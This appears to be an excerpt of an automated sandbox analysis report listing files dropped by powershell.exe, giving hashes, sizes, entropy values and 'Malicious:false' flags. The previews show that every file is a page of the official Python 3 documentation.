                                                                                                                                                                                                              SHA-512:5FDA8E4E4DD8AAA6A4B9BD28CAC7D3FAFE4EA4A09DED3E884B454EFCF770BB51BCE6E6131C6BEDCC9E33D2DEC49E6F108E7482CA9D966F02A62492C222451065
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Regular Expression HOWTO" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/regex.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, A.M. Kuchling < amk@amk.ca>,. Abstract: This document is an introductory tutorial to using regular expressions in Python with the re module. It provides a gentler introduction than the corr..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, A.M. Kuchling < amk@amk.ca>,. Abstract: This documen
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (437), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):48371
                                                                                                                                                                                                              Entropy (8bit):4.867642560719307
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:iqyWol2MFRC7RhsdyriQksehwnmk9PvoaH9oToMkM0762/:iqyAMFRC73scFksvmkFoa+EM0762/
                                                                                                                                                                                                              MD5:44DC831FA79F34098C34B1B390B4F9C2
                                                                                                                                                                                                              SHA1:CAA1C7CA4E2524FA7595687E9E3692ED2D95A921
                                                                                                                                                                                                              SHA-256:4D01A3781FE61933268E737BFC204EFD94B81D30824F93470D70FE904144D647
                                                                                                                                                                                                              SHA-512:20B63F099A25EC0EAEC658F24666A45EA111A0335D9D5EFD8D144A80EF6FD34CC8F248D5FCC00DFFCFEC06B2BF452ED5136DE1198143F43A46EEE25ACCDB7C98
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Socket Programming HOWTO" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/sockets.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, Gordon McMillan,. Abstract: Sockets are used nearly everywhere, but are one of the most severely misunderstood technologies around. This is a 10,000 foot overview of sockets. It.s not reall..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, Gordon McMillan,. Abstract: Sockets are used nea
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (724), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):48999
                                                                                                                                                                                                              Entropy (8bit):4.924697559679999
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:dqy5/iZvMhixKBw4iUToAoxnSOL4ZXtz+CWc9j6PeKVJ/iuzMI762/:dqyJOMhixKBw4iUQnSOSXtz+CWc9OP9P
                                                                                                                                                                                                              MD5:D4BAEB8EE8265ECABD47890E3D1A1045
                                                                                                                                                                                                              SHA1:300EE2E59517DA6D30862CA4E100A657AD8F6D4B
                                                                                                                                                                                                              SHA-256:A775E56BDCA04F2D2F5AF5AFA1D26DFD28D14D38519B8823D3033E08499CA2FF
                                                                                                                                                                                                              SHA-512:9BCB0A12D29FEC0B812CC2129B1D720BDDC6A48FCFFE00EAC2D08360E6415A475C155F72BBA28CE4EA613934EBF18989B9BD0A4DE9BF0E66AF44478718A20C52
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Sorting HOW TO" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/sorting.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, Andrew Dalke and Raymond Hettinger,, Release, 0.1,. Python lists have a built-in list.sort() method that modifies the list in-place. There is also a sorted() built-in function that builds a..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, Andrew Dalke and Raymond Hettinger,, Release, 0.1,. Python l
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (671), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):85466
                                                                                                                                                                                                              Entropy (8bit):4.983434276926685
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:eqyuMS1E0FmALFyjFAszAe5WRpI9HHB95JCtlGATIH9++MMf762/:PK7ALmICgPA
                                                                                                                                                                                                              MD5:DA331A94AAE3BDD7502D42D321F3E57B
                                                                                                                                                                                                              SHA1:4EB92A63F315CA0C71688ADA460BCF65C72F883C
                                                                                                                                                                                                              SHA-256:57A165F053A6EB7BA2FE46275D6966CEA296CE4F1F9E15CED7041EE035C70C2D
                                                                                                                                                                                                              SHA-512:7FDD9A1A6F7951A3BB2D79790A1024D7E1661739654B09E78F7BA6D935EBBAC4E6EF4C6D231C1A79640AB6F5872F2C15200A72A307BEA12CA2D8C390F2F0248B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Unicode HOWTO" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/unicode.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Release, 1.12,. This HOWTO discusses Python.s support for the Unicode specification for representing textual data, and explains various problems that people commonly encounter when trying to work w..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Release, 1.12,. This HOWTO discusses Python.s support for the Uni
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (507), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):81410
                                                                                                                                                                                                              Entropy (8bit):4.917543015515236
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:sqyCMYuEuAN5yENYdS73owcIcw6T1arpuXUHNC3Ov9qf9F9M9762/:fvuQyLOFuR3rA
                                                                                                                                                                                                              MD5:E3475460228B9DC62DC9D7E80F75A60F
                                                                                                                                                                                                              SHA1:16D51F1B955F889791C48E9B46F44EB7F0AB4A79
                                                                                                                                                                                                              SHA-256:A35EA3E9D27B52CC6336BC19C9F1A4C5D39E555CA4216F35A93834196B0949A9
                                                                                                                                                                                                              SHA-512:22459B278C34FDF44C101B9CE4C938DC87AD1B30E364D0E96209B528F5862CE457A1C03BDFC7F654AD92E9D36338D579530BCDF053B457EC02BD3869016B54F9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="HOWTO Fetch Internet Resources Using The urllib Package" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/howto/urllib2.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Author, Michael Foord,. Introduction: Related Articles: You may also find useful the following article on fetching web resources with Python: Basic Authentication A tutorial on Basic Authentication..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Author, Michael Foord,. Int
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14567
                                                                                                                                                                                                              Entropy (8bit):4.881984834741014
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:N+9UHtxX1vD0ANrcMff3hqJN5UjEMooq0+kcMffZ76zqWTC:9HtxlncM4JN5Ujy8cMZ76zqWTC
                                                                                                                                                                                                              MD5:2CCF2AED6679469703639DDC730E93A8
                                                                                                                                                                                                              SHA1:4262453F2E5B911A63E6C58952358ECF08D63A3C
                                                                                                                                                                                                              SHA-256:6D5C17DACA93DAD946747D2556CF7B47AA6FA53ED2AB70A5EBF670149F0D7AED
                                                                                                                                                                                                              SHA-512:236FF780B68DB91682B83D8FEAA989605E64BA947E20B0B62D6A881B966E80D99677F6672C433F5FB7698E4A2143A6CAF3E5C0E7DAECC77EE163708FC8F5D830
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="./">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>3.12.2 Documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="_static/pygments.css?v=80d5e7a1" />.. <link rel="stylesheet" type="text/css" href="_static/pydoctheme.css?v=e8a97c27" />.. <link id="pygments_dark_css" media="(prefers-color-scheme: dark)" rel="stylesheet" type="text/css" href="_static/pygments_dark.css?v=b20cc3f5" />.. .. <script src="_static/documentation_options.js?v=88fa046d"></script>.. <script src="_static/doctools.js?v=888ff710"></script>.. <script src="_static/sphinx_highlight.js?v=dc90522c"></script>.. .. <script src="_static/sidebar.js"></script>.. .. <link rel="search" type="application/opensearchdescription+xml".. title="Search within Python 3.12.2 docum
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):30852
                                                                                                                                                                                                              Entropy (8bit):4.885895280128225
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:fHqkl5r3niaTMcJaQ+QM/TpG3gh6QfqKUhrvvpGBni4TMY76zqWTC:fqy5zi4McJrQTk3vKirvRSiWMY762/
                                                                                                                                                                                                              MD5:81F297A126BC3AFBB34967D871ED5D5F
                                                                                                                                                                                                              SHA1:6D6F11F0A7C9ADFD7E447C0A1E9F914C061DF863
                                                                                                                                                                                                              SHA-256:02F48448170A84CD2D5AC4937F6072E383D17728775879A12326D2F67AB014A4
                                                                                                                                                                                                              SHA-512:D3555EBD9635ABDB7A20D5C5FDCDA0EFF1F9713C5132E427D9469159306B6CD9D9E8CAA4FEBA95EC413EBEBC24974E4F5C01E71CA733BB74A947FD29E76A6009
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Installing Python Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/installing/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Email, distutils-sig@python.org,. As a popular open source development project, Python has an active supporting community of contributors and users that also make their software available for other..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Email, distutils-sig@python.org,. As a popular open so
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (570), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):75268
                                                                                                                                                                                                              Entropy (8bit):4.824516677948764
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:3qyiMFSoAAB2MteSsaHwYy1wY1jg7Rm6m0TaH0htSke6sY+UHdJTaoGNCn5p4lIn:BVRwYy1wY+9X4M7QA
                                                                                                                                                                                                              MD5:980F4642208772101C93AE29851577E2
                                                                                                                                                                                                              SHA1:C5BB48620B7E9A55419F349C904183D6AFB4FF84
                                                                                                                                                                                                              SHA-256:3F1C1D4405428AADF353A60C6B1229BA7F11BE68B3C89B2469292E7AD70C2A37
                                                                                                                                                                                                              SHA-512:C4B8F4190A3E299F22BFC59342779C86EA1C7A63DA48B3B833D5CD784A8EC0D7D17ED56AF08B80217E5DA04BDD387C43F577736B38C6CCFD5494116723C7BE06
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="2to3 . Automated Python 2 to 3 code translation" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/2to3.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="2to3 is a Python program that reads Python 2.x source code and applies a series of fixers to transform it into valid Python 3.x code. The standard library contains a rich set of fixers that will ha..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="2to3 is a Python program that read
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (496), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):51063
                                                                                                                                                                                                              Entropy (8bit):4.8203106438266845
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:pqyoM0ox5dnD/IuWejhe13YM63lGYUx/Ymx1Yk++QHg1+VKlNMv762/:9x5LuA
                                                                                                                                                                                                              MD5:0B8E1D44340652DEEBF5846E8666D1AC
                                                                                                                                                                                                              SHA1:A57AAD169C682B6F7296CD9541C3E1651C169BB9
                                                                                                                                                                                                              SHA-256:11F7EF522A43A027BA285ECC0878BF73CC00A822710E1BA538CF7E4F223F1705
                                                                                                                                                                                                              SHA-512:BBFD6A768C81B194F03E00DEE9BA7C6E6E5AA3139AA8F82B8799D0FF1B33746BEE9AA006F5CB02AED5651AE2A65D3A5F553ED644F3087FF5AF60A7D200FA9029
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="abc . Abstract Base Classes" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/abc.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/abc.py This module provides the infrastructure for defining abstract base classes(ABCs) in Python, as outlined in PEP 3119; see the PEP for why this was added to Python. (See also ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/abc.py This module provides the infras
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (732), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):39228
                                                                                                                                                                                                              Entropy (8bit):4.841796702213491
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:UqycpTMmJY32LaMyFxh255tcD4Z7kIhf4FDYzODSF62pqMsM5oQYxfYd9G0NA8os:UqywMmSGLaMyFxq5tcD4Z7kIhf4FDYSi
                                                                                                                                                                                                              MD5:1BE3761A720FF2E3CE1A2108C835A76D
                                                                                                                                                                                                              SHA1:7B60EFE3B02E4336A2DD268447763F829912751C
                                                                                                                                                                                                              SHA-256:A20273A6A1F61558861D07A412A70E83051B994B2435549CF609B1D0CE81C601
                                                                                                                                                                                                              SHA-512:6366945A65F22B6DF48B2DDC14AE35CA379D4CB0F43F228967DFF86F92BE9A3D0650383224E069CFDE81304EF338B263243570852F4D049ECD5B5BC00CC8BA95
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="aifc . Read and write AIFF and AIFC files" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/aifc.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/aifc.py This module provides support for reading and writing AIFF and AIFF-C files. AIFF is Audio Interchange File Format, a format for storing digital audio samples in a file. AIF..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/aifc.py This module pro
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):38720
                                                                                                                                                                                                              Entropy (8bit):4.841335120086446
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:nK0iqybqZ93MsvchlhLMjDr5+pqy9bMx762/:nKrqyuMsvCwvrsMx762/
                                                                                                                                                                                                              MD5:90BCFA0ED2C188A03D10CFBB2EAD1691
                                                                                                                                                                                                              SHA1:4118BA3880E2639C2CB4ECFEB54942EE2A270426
                                                                                                                                                                                                              SHA-256:9B6BF3AE0B4730DBA12204499B8EDA700ED2B0459CC58B057427CAA28C566162
                                                                                                                                                                                                              SHA-512:72AA65D706A511AB0A37A7E31EFCA169BC0ADDB74A9DED11F76CFF6D4AE18178571A0B8BFD37B0F30859EBD1E8FED64DE796EB109971D0E96B98B6D4230938E4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Generic Operating System Services" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/allos.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter provide interfaces to operating system features that are available on (almost) all operating systems, such as files and a clock. The interfaces are generally m..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter provide int
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (390), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20251
                                                                                                                                                                                                              Entropy (8bit):4.891998433052765
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:9zaHHqklEfi2tn9TMTvWaJtOLi3fv2jnhTMs76zqWTC:QnqyEfttpMLbOLi3fOjlMs762/
                                                                                                                                                                                                              MD5:D575CF283FAE1044FA9E85CE934FEC92
                                                                                                                                                                                                              SHA1:0BDD06E8ACD17DD741D7C39C595E4A47075BDF03
                                                                                                                                                                                                              SHA-256:D563455BEEE40205906ACE23A66F31103A87E9DEC4FE1199A2E518E4CA460481
                                                                                                                                                                                                              SHA-512:BF6F9EF5EED769055750656FA3D5F1B40522B2A85817F3AD7FFD3287D07E9C58A6E93C94801AB606F9074570C80597401A096E2A2DEEFCDF131615C2740DD469
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Data Compression and Archiving" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/archiving.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The modules described in this chapter support data compression with the zlib, gzip, bzip2 and lzma algorithms, and the creation of ZIP- and tar-format archives. See also Archiving operations provid..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The modules described in this chapter support da
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3031), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):331709
                                                                                                                                                                                                              Entropy (8bit):4.773738779722747
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:PchmvvhzB3YBNxDN9GxqLZQjLntaE1GSzMlhDMA:Pcmh5Y0xx/tjUDMA
                                                                                                                                                                                                              MD5:214BED1B2AC9D3F1B05F3DB86A0F0ECE
                                                                                                                                                                                                              SHA1:07E0166552A2049B389B5C8E74DD5614EAF28438
                                                                                                                                                                                                              SHA-256:181A172BB0220B144481793732C491ECC1F2E4ED16E0E490056DC099290CCA46
                                                                                                                                                                                                              SHA-512:12867485F3D29BC5F65ED77E170BFA1ED6BEA6B29B1419619CB07A78BF729DD6D2048D56D3725776EDE96B709392FF73A1A0640B7D17349867DAFCF9CECCC000
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="argparse . Parser for command-line options, arguments and sub-commands" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/argparse.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/argparse.py Tutorial: This page contains the API reference information. For a more gentle introduction to Python command-line parsing, have a look at the argparse tutorial. The arg..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (608), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):42021
                                                                                                                                                                                                              Entropy (8bit):4.851445276177623
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:/qy99WMNVPWxulZbImVO/OF88OICc/KF04lXi5AJXArmOSYRpf4GUOlUV4hJi30P:/qyKMNVPWxulBImVO/OF88OICc/KF048
                                                                                                                                                                                                              MD5:46D830DDFDD624A2B72FED706CD23F98
                                                                                                                                                                                                              SHA1:68D93950526A68835440CEC9663728E311F27A6E
                                                                                                                                                                                                              SHA-256:7BAE1C0A7A918B2B80247850C41C5221DEBF0EC5E1DC9CAE1720A6319B2D3990
                                                                                                                                                                                                              SHA-512:3457F365900E4EC62ECBF20A50546BC28AC42B51113576FD2BBF9DE29DF1E2F3FAA5AF031CE397CB1CC1AE42BD624506CDA39D127B0FE40A0F7C9D12216E19A3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="array . Efficient arrays of numeric values" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/array.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This module defines an object type which can compactly represent an array of basic values: characters, integers, floating point numbers. Arrays are sequence types and behave very much like lists, e..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This module defines an object type whi
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (710), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):336326
                                                                                                                                                                                                              Entropy (8bit):4.693017335744455
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:lqyNMrDX0N/zIwTeBwIECw/krKhhka6TkQKnpQEsZDPlrXriPDAxXa+7/wqZVwqm:atuC7BBbBM4jD/Qw/cN0A
                                                                                                                                                                                                              MD5:DE541C71397A9E25B167B4AD2E3F3BD0
                                                                                                                                                                                                              SHA1:BAE0079C19E865585E3D9526069638B92DB7291F
                                                                                                                                                                                                              SHA-256:30398F3548DCC5B94373164D808CA5E64403D0F3D885F0898661BFB40064AD38
                                                                                                                                                                                                              SHA-512:AA019082C8BB6BFDAB0D04D596C0E607A5B53BE98070A7DA19E79C82CD39393F71AA0EE878980F72C51749C65362C560F0098AF8BB087721BA28036C8F6FA1EA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="ast . Abstract Syntax Trees" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/ast.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Source code: Lib/ast.py The ast module helps Python applications to process trees of the Python abstract syntax grammar. The abstract syntax itself might change with each Python release; this modul..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Source code: Lib/ast.py The ast module helps Python app
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32528
                                                                                                                                                                                                              Entropy (8bit):4.901538739241262
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:WyEuEQntiKHqkX1vlB6MnMgtn9TM8lWsBrlBCk4UaZ4369GGwXorwa7NwUkVWors:jHqklvDtn9TMi4cSnujnhTMh76zqWTC
                                                                                                                                                                                                              MD5:E64322040EAC4CCFED3790AF3E6E64B7
                                                                                                                                                                                                              SHA1:5FBB95171E5E6A0B7C92D8A51851936E5D6B64A6
                                                                                                                                                                                                              SHA-256:FC970B2F6EFBE48EAF4142DEBB86CE6457168C5567F4F7C1AC360C888DC4F948
                                                                                                                                                                                                              SHA-512:28A9159B9331CD658B5F78EE592AF64999AB9D62410D994B7EE5E2FD624E49FAC3A7E13DAA662EF395A3D871BFCD3F605F62C1A3DF5A0E686E334D113A2FD3B3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="High-level API Index" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/library/asyncio-api-index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This page lists all high-level async/await enabled asyncio APIs. Tasks: Utilities to run asyncio programs, create Tasks, and await on multiple things with timeouts.,, run(), Create event loop, run ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This page lists all high-level async/await enabled
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (509), with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40302
                                                                                                                                                                                                              Entropy (8bit):4.858235818847695
                                                                                                                                                                                                              Encrypted:false
